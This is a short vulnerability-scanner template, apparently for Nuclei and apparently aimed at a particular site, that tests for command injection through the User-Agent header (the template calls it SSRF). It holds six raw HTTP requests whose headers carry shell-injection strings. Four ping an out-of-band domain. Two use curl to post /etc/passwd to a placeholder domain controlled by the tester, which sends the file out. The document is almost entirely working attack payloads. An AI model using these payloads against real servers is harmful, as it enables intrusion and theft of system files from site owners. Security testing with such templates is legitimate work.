id: shaadi-ssrf

info:
  name: useragent-ssrf
  author: faique
  severity: Critical

http:
  - raw:
      - |
        GET /?? HTTP/2
        Host: {{Hostname}}
        User-Agent: &(:;)&'\"`0&(ping -c 1 {{Host}}.ua.{{MY-DOMAIN}})&`'

      - |
        GET /robots.txt HTTP/2
        Host: {{Hostname}}
        User-Agent: &(:;)&'\"`0&(ping -c 1 {{Host}}.ua.{{MY-DOMAIN}})&`'

      - |
        GET /index.php HTTP/2
        Host: {{Hostname}}
        User-Agent: &(:;)&'\"`0&(ping -c 1 {{Host}}.ua.{{MY-DOMAIN}})&`'

      - |
        POST // HTTP/2
        Host: {{Hostname}}
        User-Agent: &(:;)&'\"`0&(ping -c 1 {{Host}}.ua.{{MY-DOMAIN}})&`'

      - |
        POST /index.php HTTP/2
        Host: {{Hostname}}
        User-Agent: &(:;)&'\"`0&(curl -X POST -d @/etc/passwd http://{{MY-DOMAIN}})&`'

      - |
        POST // HTTP/2
        Host: {{Hostname}}
        User-Agent: &(:;)&'\"`0&(curl -X POST -d @/etc/passwd http://{{MY-DOMAIN}})&`'



    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS or HTTP Interaction
        words:
          - "dns"
          - "http"